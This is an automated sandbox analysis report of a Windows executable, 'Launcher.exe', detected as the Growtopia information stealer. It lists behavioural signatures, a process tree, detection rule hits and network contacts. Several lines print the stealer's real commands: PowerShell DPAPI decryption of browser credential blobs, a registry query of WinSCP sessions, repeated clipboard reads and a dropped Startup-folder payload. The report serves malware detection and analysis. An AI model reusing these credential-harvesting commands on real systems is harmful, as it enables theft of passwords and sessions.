Windows Analysis Report
Launcher.exe

Overview

General Information

Sample name: Launcher.exe
Analysis ID: 1632293
MD5: b3670f482f26691a50a85376ddde32ad
SHA1: 48b5c319abdf25365f3613893139f4f5c2f011f5
SHA256: c67dc6e962a28b421cdff1b27d9efa4ba97c3d467f2e21766d168c66b971926b

Detection

Growtopia
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Growtopia
Drops PE files to the startup folder
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Overwrites Mozilla Firefox settings
Sigma detected: Dot net compiler compiles file from suspicious location
Suspicious command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Enumeration for 3rd Party Creds From CLI
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: PowerShell Script Run in AppData
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Tries to detect if online games are installed (MineCraft, World Of Warcraft etc)
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64_ra
  • Launcher.exe (PID: 5496 cmdline: "C:\Users\user\Desktop\Launcher.exe" MD5: B3670F482F26691A50A85376DDDE32AD)
    • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6688 cmdline: C:\Windows\system32\cmd.exe /d /s /c "hostname" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • HOSTNAME.EXE (PID: 6032 cmdline: hostname MD5: 33AFAA43B84BDEAB12E02F9DBD2B2EE0)
    • cmd.exe (PID: 6544 cmdline: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 7120 cmdline: C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\user\AppData\Roaming\temp.ps1 " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5632 cmdline: powershell.exe -noprofile - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 3840 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
          • cvtres.exe (PID: 6344 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3D45.tmp" "c:\Users\user\AppData\Local\Temp\anq2mtqn\CSCF5995D8BF694D46AD6A4558D7F1AF.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • reg.exe (PID: 4868 cmdline: C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • cmd.exe (PID: 6432 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • tasklist.exe (PID: 1272 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 3004 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,77,127,197,5,168,152,200,155,69,152,248,126,243,173,208,170,177,11,23,236,4,169,187,112,241,90,67,2,84,166,57,221,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,60,145,70,140,215,187,63,14,237,133,51,108,6,54,190,49,3,104,104,254,170,42,244,243,157,99,154,78,3,72,94,164,48,0,0,0,166,79,77,120,154,92,2,100,62,122,156,178,149,130,253,55,138,66,130,243,72,252,212,17,151,208,209,36,74,236,133,103,0,200,20,58,119,255,106,79,88,97,171,172,50,51,135,138,64,0,0,0,214,73,72,146,208,244,214,102,85,11,142,231,240,104,125,181,134,177,29,222,22,142,226,145,204,128,227,183,233,28,145,105,42,124,121,226,218,198,67,214,130,64,131,113,170,34,15,172,229,198,163,153,131,134,138,65,60,93,25,230,160,219,252,77), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 1852 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,77,127,197,5,168,152,200,155,69,152,248,126,243,173,208,170,177,11,23,236,4,169,187,112,241,90,67,2,84,166,57,221,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,60,145,70,140,215,187,63,14,237,133,51,108,6,54,190,49,3,104,104,254,170,42,244,243,157,99,154,78,3,72,94,164,48,0,0,0,166,79,77,120,154,92,2,100,62,122,156,178,149,130,253,55,138,66,130,243,72,252,212,17,151,208,209,36,74,236,133,103,0,200,20,58,119,255,106,79,88,97,171,172,50,51,135,138,64,0,0,0,214,73,72,146,208,244,214,102,85,11,142,231,240,104,125,181,134,177,29,222,22,142,226,145,204,128,227,183,233,28,145,105,42,124,121,226,218,198,67,214,130,64,131,113,170,34,15,172,229,198,163,153,131,134,138,65,60,93,25,230,160,219,252,77), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 3172 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,229,84,116,194,55,158,10,155,7,192,49,104,248,171,26,45,193,192,136,51,159,58,190,20,160,100,225,172,82,201,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,132,84,197,246,171,78,251,4,184,21,210,77,231,199,226,99,5,37,235,235,142,78,56,131,31,47,57,48,134,233,72,33,48,0,0,0,133,210,231,65,176,63,231,110,125,215,114,63,38,34,35,188,254,41,153,224,42,114,53,153,20,177,217,39,200,54,6,187,214,56,242,234,172,181,105,212,150,84,57,216,214,140,120,82,64,0,0,0,223,114,148,158,168,50,101,199,84,98,138,135,54,87,107,183,131,69,246,154,227,198,116,130,148,205,149,173,54,39,176,144,53,100,44,173,255,21,46,131,221,11,133,10,234,13,131,89,161,121,97,59,116,23,242,182,143,114,51,199,52,30,88,41), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 2080 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,229,84,116,194,55,158,10,155,7,192,49,104,248,171,26,45,193,192,136,51,159,58,190,20,160,100,225,172,82,201,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,132,84,197,246,171,78,251,4,184,21,210,77,231,199,226,99,5,37,235,235,142,78,56,131,31,47,57,48,134,233,72,33,48,0,0,0,133,210,231,65,176,63,231,110,125,215,114,63,38,34,35,188,254,41,153,224,42,114,53,153,20,177,217,39,200,54,6,187,214,56,242,234,172,181,105,212,150,84,57,216,214,140,120,82,64,0,0,0,223,114,148,158,168,50,101,199,84,98,138,135,54,87,107,183,131,69,246,154,227,198,116,130,148,205,149,173,54,39,176,144,53,100,44,173,255,21,46,131,221,11,133,10,234,13,131,89,161,121,97,59,116,23,242,182,143,114,51,199,52,30,88,41), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 2292 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 2544 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 3432 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6412 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 4836 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5124 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 4788 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6516 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 2664 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 4740 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 6136 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6448 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 6840 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 3392 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 5800 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6372 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 5904 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5632 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 6428 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 3416 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 4804 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 4656 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 4580 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6732 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 816 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 4628 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
Name: Growtopia
Description: According to PCrisk, Growtopia (also known as CyberStealer) is an information stealer written in the C# programming language. It can obtain system information, steal information from various applications, and capture screenshots. Its developer claims that it has created this software for educational purposes only. This stealer uses the name of a legitimate online game.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.growtopia
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000003.1551859115.0000017526795000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: Launcher.exe PID: 5496 | JoeSecurity_Growtopia | Yara detected Growtopia | Joe Security
Process Memory Space: Launcher.exe PID: 5496 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
        Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -noprofile -, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5632, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline", ProcessId: 3840, ProcessName: csc.exe
        Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions", CommandLine: C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions", CommandLine|base64offset|contains: AA, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\Launcher.exe", ParentImage: C:\Users\user\Desktop\Launcher.exe, ParentProcessId: 5496, ParentProcessName: Launcher.exe, ProcessCommandLine: C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions", ProcessId: 4868, ProcessName: reg.exe
        Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Launcher.exe", ParentImage: C:\Users\user\Desktop\Launcher.exe, ParentProcessId: 5496, ParentProcessName: Launcher.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard", ProcessId: 2292, ProcessName: cmd.exe
        Source: Process started; Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community; Data: Command: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Launcher.exe", ParentImage: C:\Users\user\Desktop\Launcher.exe, ParentProcessId: 5496, ParentProcessName: Launcher.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -", ProcessId: 6544, ProcessName: cmd.exe
        Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\Desktop\Launcher.exe, ProcessId: 5496, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exe
        Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5632, TargetFilename: C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline
        Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell.exe -noprofile -, CommandLine: powershell.exe -noprofile -, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6544, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -noprofile -, ProcessId: 5632, ProcessName: powershell.exe
        Source: Process started; Author: frack113; Data: Command: hostname, CommandLine: hostname, CommandLine|base64offset|contains: -, Image: C:\Windows\System32\HOSTNAME.EXE, NewProcessName: C:\Windows\System32\HOSTNAME.EXE, OriginalFileName: C:\Windows\System32\HOSTNAME.EXE, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "hostname", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6688, ParentProcessName: cmd.exe, ProcessCommandLine: hostname, ProcessId: 6032, ProcessName: HOSTNAME.EXE

        Data Obfuscation

        Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -noprofile -, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5632, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline", ProcessId: 3840, ProcessName: csc.exe
        No Suricata rule has matched

        AV Detection

        Source: Launcher.exe; Avira: detected
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exe; ReversingLabs: Detection: 34%
        Source: Launcher.exe; ReversingLabs: Detection: 34%
        Source: Launcher.exe; Virustotal: Detection: 48%
        Source: Submitted Sample; Integrated Neural Analysis Model: Matched 96.6% probability
        Source: Launcher.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: D:\a\dpapi\dpapi\build\Release\dpapi.pdb source: Launcher.exe, 00000000.00000003.1498567944.0000017526712000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1515067184.0000017526090000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\node-sqlite3\node-sqlite3\build\Release\node_sqlite3.pdb source: Launcher.exe, 00000000.00000003.1476689019.000001752696F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1338150455.000001752651D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440142537.00000175283C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1336270398.000001752650D000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\system32\catroot2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\System32\AppxSip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\SYSTEM32\OpcServices.DLL
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\96630093aeac18623f8eafa5a10c8ba7\System.Data.ni.dll
        Source: Joe Sandbox View; IP Address: 162.159.137.232
        Source: Joe Sandbox View; IP Address: 104.26.13.205
        Source: unknown; DNS query: name: api.ipify.org
        Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic; DNS traffic detected: DNS query: api.ipify.org
        Source: global traffic; DNS traffic detected: DNS query: canary.discord.com
        Source: global traffic; DNS traffic detected: DNS query: discord.com
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://narwhaljs.org)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nodejs.org/).
        Source: Launcher.exe, 00000000.00000003.1383139729.00000105F8501000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1293055581.00000175265C5000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1301065927.00000175265C7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://sheetjs.com
        Source: Launcher.exe, 00000000.00000003.1515621239.00000175261C1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1519009101.00000175265C6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1511405754.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1512804492.00000198A0801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://snipplr.com/view/5945/javascript-numberformat--ported-from-php/
        Source: Launcher.exe, 00000000.00000003.1515621239.00000175261C1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1519009101.00000175265C6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1511405754.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1512804492.00000198A0801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://snipplr.com/view/5949/format-humanize-file-byte-size-presentation-in-javascript/
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js
        Source: Launcher.exe, 00000000.00000003.1557876754.00000175264FC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1557876754.00000175264EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/a/62888/10333
        Source: Launcher.exe, 00000000.00000003.1515621239.00000175261C1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1519009101.00000175265C6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1511405754.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1512804492.00000198A0801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/questions/679915/how-do-i-test-for-an-empty-javascript-object-from-json/679
        Source: Launcher.exe, 00000000.00000003.1300104935.00000175262EB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1386921235.0000036327841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://substack.net
        Source: Launcher.exe, 00000000.00000003.1314370569.00000175265F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tootallnate.net)
        Source: Launcher.exe, 00000000.00000003.1275681448.00000175261D1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1261532478.00000175261D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://twitter.com/jonschlinkert)
        Source: Launcher.exe, 00000000.00000003.1279400682.0000017526527000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.0000017526508000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1271970158.0000017526311000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1278730215.0000017526197000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1279400682.000001752651F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1279400682.0000017526513000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1278601726.000001752612D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1269086365.0000017526259000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1376078593.00000238E3701000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1278992463.0000017526262000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1263859676.00000175260F9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1280187961.0000017526197000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.00000175264FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://underscorejs.org/LICENSE
        Source: Launcher.exe, 00000000.00000003.1231112083.000001752607D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1231112083.00000175260CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://url.spec.whatwg.org/#urlutils
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://userguide.icu-project.org/strings/properties
        Source: Launcher.exe, 00000000.00000003.1431465558.0000017529E3E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1435843049.0000017526712000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.archive.org/web/20140401031018/http://rjpower9000.wordpress.com:80/2012/04/09/fun-with-sh
        Source: Launcher.exe, 00000000.00000003.1537773023.00000175261C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://webrsa.cvs.sourceforge.net/viewvc/webrsa/Client/RSAES-OAEP.js?content-type=text%2Fplain:
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
